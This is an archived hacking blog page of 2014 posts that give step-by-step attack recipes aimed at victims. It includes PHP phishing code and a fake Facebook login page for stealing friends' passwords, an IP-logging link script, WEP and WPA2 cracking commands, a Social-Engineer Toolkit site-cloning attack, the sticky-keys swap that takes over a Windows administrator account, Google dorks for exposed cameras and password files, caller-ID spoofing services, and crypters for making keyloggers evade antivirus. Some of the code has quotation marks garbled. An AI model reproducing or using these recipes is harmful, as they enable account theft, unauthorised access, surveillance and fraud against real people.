Showing posts with label hacking. Show all posts

Sunday, 6 July 2014

How To Hack Facebook Using Phishing Method??

There are various methods to hack the Facebook account. I have not listed all here but I have described very popular method to hack Facebook account password by anyone called Phishing.
For this We need three files:
Follow There Steps :
1) Php file
2) Fake facebook login page
3) Text file to store password

1) Create your php file
    Open notepad and copy this code:

    header (?Location: https://login.facebook.com/login.php?);
     $handle = fopen(?password.txt?, ?a?);
     foreach($_POST as $variable => $value) {
     fwrite($handle, $variable);
     fwrite($handle, ?=?);
     fwrite($handle, $value);
     fwrite($handle, ?\r\n?);
     }
     fwrite($ handle, ?\r\n?);
     fclose($handle) ;
     exit;
     ?>

Now save this file as phishing.php or file_name.php
Your php file is now created
If you Don't understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

2) Create Facebook fake login page
Now go to facebook login page and right click > View Source.Copy source in notepad and save it as facebooklogin .html .
Now open source code of this HTML file We need to find the place where Login code in facebook page that where send the user after clicking on it.
Now Press crtl + f after opening source code and search for this code
action=anything
In this case we have like this

action=?https://login.facebook.com/login.php??

We replace that part with:

    action=?phishing.php?

Save your facebook.html file

3) Text file :
Create a blank text file and name it password.txt

Now upload all the three files Facebooklogin.html, phishing.php,Password.txt in any free web hosting site directory like 000webhost.com.com and now you can just check your fake facebook login page by going to http://yoursite.000webhost.com/Facebook.html for the fake login page. Just type some random user name and any password into the text box and then you will see in your file manager that a file called ?Password.txt? is created,In which the password is stored.
You can use
http://www.justfree.com/
http://www.ripway.com/
http://www.my3gb.com/

also or any other free hosting site.

Suppose you register with name facebookhack .Your link will be http://www.facebookhack.justfree.com/
After uploading files your phishing link will be
http://www.facebookhack.justfree.com/facebook.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page.
Enjoy ..:)

Wednesday, 16 April 2014

Top 10 Hacking tools Hackers must have!!!

A hacking tool is a program designed to assist with hacking, or a piece of software which can be used for hacking purposes.
Examples include Nmap, Nessus, John the Ripper, SuperScan, p0f, and Winzapper.^[1] Bribes have also been described as among the most potent hacking tools, due to their potential exploitation in social engineering attacks.^[2] Occasionally, common software such as ActiveX is exploited as a hacking tool as well.
Source: Wikipedia
10. Putty

Although putty is not a hacking software by itself, it is a very useful tool for a hacker. It is a client for SSH and telnet, which can be used to connect to remote computers. You may use putty when you want to connect to your Backtrack machine from your Windows PC. It can also be used to perform SSH tunneling to bypass firewalls.
9. hping3

Hping3 sends custom ICMP, UDP, or TCP packets and then displays any replies. It is similar to the ping command, but offers much more control over the packets sent. This tool is very useful when trying to traceroute/ping/probe hosts that have firewalls blocking normal pings. You can even craft your own packets to perform denial of service attacks using this tool. It is available in Windows and linux.
8. Nessus

Nessus is a comprehensive automatic vulnerability scanner. You have to give it an IP address as input and it will scan that IP address to find out the vulnerabilities in that system. Once you know the vulnerabllities, you can use metasploit to exploit the vulnerablity. Nessus works both in Windows and Linux.
7.THC Hydra

Hydra is a fast password cracker tool. It cracks passwords of remote systems through the network. It can crack passwords of many protocols including ftp,http, smtp etc. You have the option to supply a dictionary file which contains possible passwords. It is best to use hydra under linux environment.
6. Aircrack-ng

Aircrack-ng is a set of tools that are used to crack wifi passwords. Using a combination of the tools in aircrack, you can easily crack WEP passwords. WPA passwords can be cracked using dictionary or brute force. Although aircrack-ng is available for Windows, it is best to use it under Linux environment. There are many issues if you use it under Windows environment.
5. Burp Suite

Burpsuite is a web proxy tool that can be used to test web application security. It can brute force any login form in a browser. You can edit or modify GET and POST data before sending it to the server. It can also be used to automatically detect SQL injection vulnerabilities. It is a good tool to use both under Windows and Linux environments.
4. Metasploit

Metasploit is a huge database of exploits. There are thousands of exploit codes, payloads that can be used to attack web servers or any computer for that matter. This is the ultimate hacking tool that will allow you to actually “hack” a computer. You will be able to get root access to the remote computer and plant backdoors or do any other stuff. It is best to use metasploit under linux.
3. Cain and Abel

Cain and Abel is a multipurpose windows only hacking tool. It is a bit old now, but it still does the job well. Cain can be used to crack windows password, perform man in the middle attacks, capture network passwords etc.
2. Wireshark

Wireshark is a packet sniffer. It captures all network traffic going through a network adapter. When performing man in the middle attacks using tools like Cain, we can use Wireshark to capture the traffic and analyze it for juicy info like usernames and passwords. It is used by network administrators to perform network troubleshooting.
1. Nmap

Nmap is also known as the swiss army knife of hacking. It is the best port scanner with a lot of functions
In hacking, Nmap is usually used in the footprinting phase to scan the ports of the remote computer to find out wich ports are open.
Enjoy..:)

Tuesday, 8 April 2014

How to grab someone's IP address?

Follow these steps:
1) Copy the below codes into Notepad and save it as Grab.php (.php is must)

2) code:

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>

3) Now make Free account on any of the free web hosting sites Ripway.com or on My3gb .
4) Now Upload Grab.php to your web hosting site.
5) Copy the link of your uploaded file and send it to victim.
6) As soon as victim will click on your link his ip will be saved in your free web hosting site.

7) Enjoy you are Done and Share with your friends

Monday, 7 April 2014

How to Crack a Wpa2-Psk Password with Windows???

How to Crack a Wpa2-Psk Password with Windows :-

It,s very common question on the internet to How to hack a Facebook account password and how to hack a WiFi password. Even if you search on YouTube you will find a lots of tutorial to How to hack a WiFi password using backtrack. However, backtrack OS is not most handy OS for normal users. yesterday my one Facebook friend Lovito Tsuqu Kiho ask me to how to hack WiFi using commview using aircrack-ng.

Today i am going to show you how to a crack a Wp2-psk password with windows machine.

Software Requirement for this lab :-

1. CommView for Wifi ( Download)

2. Elcomsoft Wireless Security Auditor (Download)

Presently i am connected with my own wifi network Virusfound and i want to hack the password of Ultimate that is secured with Wpa2-psk encryption.

First you need to be capture the Wpa2, four-way handsake with CommView.

Open commView and click on the Start option

then click on the capture option to start the capture

now it will show you all available AP, Now click on the Tools > Select the Node Reassoication option ( if Node Rassociation is not working , then use WiFi Alfa card )

now select your target AP in the Send a deauthentication request from this AP option. it will show you all available client option.

now click on the Send Now option to send the packet for 4-way authentication. wait for some time so it will capture the packet.

now click on the Save option and choose your file format Commview Capture Files (*.ncf)

you capture work is done.

Now open Elcomsoft Wireless Security Auditor to crack your wifi password.

Click on the Import Data tab > select the Import CommViewLog option.

now it will show you information about AP and Multiple Handshake selection information. Click on Ok.

now click on the Start attack option and select the Dictionary Attack option. However you have other attack options are also available.

now within minutes it will found your password and it will show you the password.

Enjoy Wifi Hacking with Windows machine.

Friday, 4 April 2014

How To hack facebook account using backtrack or kali linux??

Follow these steps:

Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit and click Enter to start.

To choose Social -Engineering Attacks type “1” and click Enter.

For choosing Website Attack Vectors type “2” and click Enter.

To choose Web Jacking Attack Method type “5” and click Enter.

With “2” choose Site Cloner.

And now we need to IP gateway address, open new console(terminal) and type “ifconfig”
This will show our IP address. Copy IP address.

Paste the copied IP to 1. Console(terminal).

Now we will write facebook url. Type “facebook.com” and press Enter.

Our job is DONE. So now hacking accounts depends on your social-engineering. For example, you can send your IP address to your victim and say ”can you visit my page?” etc.

Let’s try;
We will write the IP address which we assigned the url.

Mail : norsinli@cw.org

şifre: Cyber-warrior

As you see, it works successfully.

The job is finished. J

Hope you like it. If so, please do not forget to comment it below and share it with your friends
Enjoy....:)

Top 5 Websites to make free calls!!!

Hello friends in this tutorial im gonna tell you about some website by which you can make free and spoofed call from your smart phone or pc.There are many websites available which offer free service to make fake calls. With these websites, you can make calls to any one from any one. In this post, we are listing 5 websites for making fake calls:

1) CrazyCall.net
CrazyCall is the most popular website used for call spoofing. Few countries have also blocked the website because of its use in many crimes. This website lets users make calls from any number they want. So, you can make prank calls with this. It also lets users change the voice to be anonymous while calling.
2) SpoofCard.com
SpoofCard is also a nice service that lets users call from any number. You can call your friends from his number. It also lets you make group calls. For using the service, you need to have credits in your account. You can make demo calls for free, but you need to buy credits for more calls.
3) Spooftel.com
Spooftel is also a similar kind of caller id spoofing service. Purchase credits and make prank calls. You can also make demo calls to see how the service works. It also has option to change the pitch of your voice. It also has an option to send messages.
4) BluffmyCall.com
BluffMyCall is another nice call spoofing web service with lots of features. It lets users change caller id, record calls, change voice and leave voice messages. After using your free minutes, you can purchase your minutes, post by helpertricks.com
5) CallerIDFaker.com
CallerIDFaker comes with better offers. You can get unlimited calling for whole month only for $29.95. Like other services, it also lets users change voice and record calls.

Warning: Use these websites only for educational purpose. These websites collect logs. If you use it for any illegal work, we will not be responsible for any criminal charge you face.
Enjoy.....:)

Sunday, 30 March 2014

How to use google to gain access to the following things!!!

Just Copy and paste the following commands in google and you will get many results!

1) Using Google to Hack Security Cameras:
(the result which have ip address type link will work!)

intitle:Live View / – AXIS

inurl:viewerframe?mode=motion

intitle:index.of finances.xls

inurl:view/index.shtml

2) Using Google to Hack Personal and Confidential Documents:

intitle:curriculum vitae phone * * * address * e-mail

filetype:xls inurl:email.xls

filetype:xls site:za confidential

filetype:xls site:ru login.

terms login, userid, and password

intitle: index of site:kr password.

3) Hacking Google to Gain Access to Free Stuffs:

?intitle:index.of?mp3 atif aslam

?intitle:index.of?avi dhoom

4) Hacking Google to Exploit Vulnerabilities:

Index of /sym/root

filetype:passwd
ENJOY......:)

Friday, 28 March 2014

Know Location Of Victim & When Your Mail Has Read!!!

Now you can find out when your email has been read by the recipient! No more guessing: "Has
he or she read my email yet?" SpyPig is a simple email tracking system that sends you a notification by email when the recipient opens your message. It works with virtually all modern email programs: Outlook, Eudora, Yahoo Email, Gmail, Hotmail, AOL Email and many others.

Follow these steps:
1) Enter your email address under .
2) any title under.
3) select the image and then copy image location if you are using firefox n paste in message body orsimple drag & drop image & then send it to the victim. When victim will open it, you will receive a message with subject
"Your email has been read with contents: Email Title: Sent by You: Your IP Address: Opened by
Recipient: Recipient Location: Recipient IP
Address: For more info visit SpyPig Website.
ENJOY.............:)

Sunday, 23 March 2014

How to Hack windows administrator account through guest account???

Follow these steps:

1) Go to C:/windows/system32.
2) Copy cmd.exe and paste it on desktop.
3) Rename cmd.exe to sethc.exe.
4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
5) Now Log out from your guest account and at the user select
window,press shift key 5 times.
6) Instead of Sticky Key confirmation dialog,command prompt
with full administrator privileges will open.
7) Now type “ NET USER ADMINISTRATOR “zzz” where “zzz”
can be any password you like and press enter.
8) You will see “ The Command completed successfully” and
then exit the command prompt and login into administrator
with your new password.
9) Now You have hacked admin through guest account.
ENJOY.....:)

Thursday, 20 March 2014

Hacking computer's file using CMD!!!

To hack someone's computer first of all we need IP address of targeted host. IP address is unique addresse of a host for identify that host on network.
Open Command Prompt, type netstat and press enter.
This command shows you all TCP connection with their ports and state. Local address shows your system address and foreign address shows all connection through you communicates. In this list find your friends IP address.
Now type “net view” command Hit enter and wait until message “The command completed successfully”
Then, Type C:\user\pcname > net view \\ your_friend_IP
like this C:\user\pcname > net view\\ 180.178.24.61 ·
After command success
Type C :\>net use H: \\ 180.178.24.61\My shared doc .
Hit enter wait until message “The command completed successfully” display. You done open “My computer” and see this
H: drive in shared mode.
ENJOY.........:)

Wednesday, 19 March 2014

How To HAck WIfi Network??

You need backtrack !
1) First we need to scan for available wireless networks.
There's this great tool for windows to do this called
“NetStumbler” or Kismet for Windows and Linux and KisMac for Mac and windows. The two most common encryption types are:
1) WEP
2) WAP
WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP
i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas WAP is currently the most secure and best option to secure a wi-fi network.. It can’t be easily cracked as WEP because the
only way to retreive a WAP key is to use a brute-force attack or dictionary atack. Here I’ll tell you how to Crack WEP To crack WEP we will be using Live Linux distribution called
BackTrack to crack WEP. BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys
1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet.
It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command: iwconfig
2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.
3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP
N=OPEN 0=OTHER(usually WAP).
4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.
5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid][device]
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.
6) Leave the above running and open another terminal. Next
we will generate some fake packets to the target access point so that the speed of the data output will
increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e[essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the accesspoint. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless
adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.
7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the
ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your
wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128[filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know
the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger
chance you have of cracking the WEP key.

Saturday, 15 March 2014

How to convert your Phone into CCTV camera???

Closed-Circuit television Camera in short its known as CCTV camera . CCTV is used to record and watch all activities in your home, shop, college or organization but the only thing CCTV is rarely used due to the budget factor . But today in this post I am going to introduce a method which will help you to use your smartphone as CCTV camera. I have used this method on my android phone so I will tell you step by step tutorial of this technique for android users. Here are some steps listed below, just read and follow them carefully.

Requirement:

Android Phone
Computer Or Laptop
Wifi Router of One more phone to make WiFi Hotspot

Steps to Follow:

STEP 1.: Download IP WEBCAM app on your android smartphone.

http://www.way2hacking.com/wp-w2h/uploads/2014/02/ipwebcam-way2hacking.jpg

STEP 2: Now start IP WEBCAM SERVER app on your phone as shown in below given first screenshot. It will open camera on your phone also shows you an IP Address assigned to your phone by WiFi Router. [In my case it is http://192.168.1.101:8080]

http://www.way2hacking.com/wp-w2h/uploads/2014/02/ip-webcam-way2hacking-2.png

http://www.way2hacking.com/wp-w2h/uploads/2014/02/ip-webcam-way2hacking-1.png

STEP 3. Open your web browser. I suggest you Chrome because it has inbuilt flash player which will help you to stream video , captured by your phone camera.

http://www.way2hacking.com/wp-w2h/uploads/2014/02/ip-webcam-way2hacking1.jpg

NOTE 1:

Please note that, your laptop or computer and your phone will be connected on same WiFi Router Modem.

NOTE 2:

If you don’t have WiFi router modem then use your friend’s phone to make WiFi hotspot and connect your phone and laptop with same hotspot device.

NOTE 3:

One more thing, you have no need of internet connection. You have to use WiFi just like Bluetooth.

Tuesday, 4 March 2014

Download FREE Best Ethical Hacking Ebooks Collection!!!

| Ethical Hacking & Gray Hat E-books |

Just Click on any Ebook Name & Download

Saturday, 1 March 2014

Make your keylogger undectable using binders and crypters!!!

Normally free remote keyloggers will create standard .exe installation file without any stealth feature. That keylogger file are easily detected by popular antiviruses. So Eventually your key-logging job will remain Incomplete.

You would have probably heard about binders and Crypters before, but what do they used for? and why they are used in keylogging process? Let us know about Crypter and Binder.

What is Crypter?

It is a software that can encrypt executable (.exe) files. Crypters are popularly used to encrypt viruses, RAT’s, keyloggers, spywares etc to make them undetectable from antiviruses.

How Does FUD Crypter Work?

The Crypter takes the original binary file of you exe and applies many encryption on it and stores on the end of file (EOF). So a new crypted executable file is created. The Basic Working Of FUD Crypter is explained below
Original Exe Crypted Exe
001————- 010    101————-110
100|Original File|000       > -> Cryptor -> ->       010|Original File|110
010————- 111    110————-010
The new exe is not detected by antiviruses because its code is scrambled by the crypter. When executed the new .exe file decrypts the binary file into small the data small pieces at a time and injects them into another already existing process or a new empty one, OR it drops the code into multiple chunks in alternative data streams (not scanned by most a/v) then executes it as a .txt or .mp3 file.

What is Binder?

Binder is a software basically used for combine the two or more files in one file under only one name and extension.
The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file.

Why Most FUD Crypters Do not Work?

When any free FUD (Fully Undetectable) crypter/binder becomes popular it also gets the eyes of antivirus companies. The antivirus companies update their software and employ detection mechanism that detect the encryption by the crypter. So, most of the popular FUD crypter are easily detected by antiviruses.

Where can You test Whether your Crypter is FUD or not?

To test you crypter encrypt any virus with it and test it on

http://scanner.novirusthanks.org

and make sure you check the box Do not distribute the sample

You can try these Crypters and Binders that are available publicly:

1) Chrome Crypter v2.0

Download: Chrome Crypter v2 – FUD.rar

TrafficG -- Free WebSite Promotion!

Firstname :
Lastname :
Email :
Username :
Password :


Visit TrafficG Now

Pages

Search This Blog

Translate

Labels

Popular Posts

Blogroll

Live Traffic feed

About

Total Pageviews

NEW OFFER !!!

About Me